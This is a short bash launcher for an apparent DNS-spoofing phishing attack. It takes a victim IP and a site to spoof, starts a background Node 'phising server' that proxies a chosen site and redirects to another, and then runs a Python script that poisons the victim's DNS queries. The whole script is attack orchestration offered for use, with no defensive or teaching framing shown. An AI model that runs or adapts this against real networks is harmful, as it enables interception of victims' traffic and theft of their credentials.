#!/bin/bash
if [ -z "$1" ]
  then echo "Please specify victim ip, e.g.  192.168.1.33 "; exit 0
fi
VIP=$1


if [ -z "$2" ]
  then echo "Please specify spoofing site ip, e.g. http://www.reddit.com/ "; exit 0
fi
SSITE=$2

if [ -z "$3" ]
then
  NSITE=$SSITE
else
  NSITE=$3
fi

if [ -z "$4" ]
then
  RSITE="https://www.google.com/"
else
  RSITE=$4
fi

echo "Poisoning $VIP, catching dns query $SSITE, proxying $NSITE, redirecting to $RSITE"

# Start node phising server
nohup node node/node.js "$NSITE" "$RSITE" &

python py/main.py -v "$VIP" -s "$SSITE"
